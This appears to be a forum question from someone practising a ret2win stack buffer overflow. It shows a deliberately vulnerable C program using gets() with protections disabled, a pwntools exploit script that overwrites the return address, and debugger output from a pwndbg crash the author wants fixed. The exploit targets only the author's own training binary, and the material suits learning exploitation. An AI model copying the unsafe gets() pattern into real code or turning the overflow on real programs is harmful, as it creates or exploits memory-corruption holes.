OS: Arch Linux x86_64
This is my source code:
// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32
#include <stdio.h>

void unsafe() {
    char buffer[40];
    puts("Overflow me");
    gets(buffer);
}

void main() {
    unsafe();
}

void flag() {
    puts("Exploited!!!!!");
}
This is my exploit script:
from pwn import *
context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['alacritty', '-e']
p = process('./vuln')
gdb.attach(p, 'b *0x080491aa')
payload = b'A' * 52
payload += p32(0x080491c3)
pause()
p.sendline(payload)
p.interactive()
Here are the commands I used in the pwndbg interface:
pwndbg> r
Starting program: /home/cub3y0nd/Downloads/ret2win/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Overflow me
After using the r command, I sent a newline in the exploit interface, then pwndbg crashed. These are the exploit interface's contents:
λ ~ python exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb']
[DEBUG] Created script for new terminal:
#!/usr/bin/python
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/alacritty', '-e', '/tmp/tmpikuhhld1']
[+] Waiting for debugger: Done
[*] Paused (press any to continue)
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 c3 91 04 08 0a │AAAA│····│·│
00000039
[*] Process './vuln' stopped with exit code -9 (SIGKILL) (pid 175664)
Traceback (most recent call last):
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 702, in send_raw
self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/cub3y0nd/Downloads/ret2win/exp.py", line 16, in <module>
p.sendline(payload)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 816, in sendline
self.send(line + self.newline)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 795, in send
self.send_raw(data)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 704, in send_raw
raise EOFError
EOFError
I tried the same thing on another computer, and it worked normally; pwndbg didn't crash.
I don't know where the problem is. I tried reinstalling pwndbg and pwntools, but that didn't solve the problem.
And every time I open pwndbg I receive this warning:
/usr/share/pwndbg/gdbinit.py:10: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  import pkg_resources
I don't know if this warning affects anything.
Please tell me how to solve this pwndbg hook debugging problem.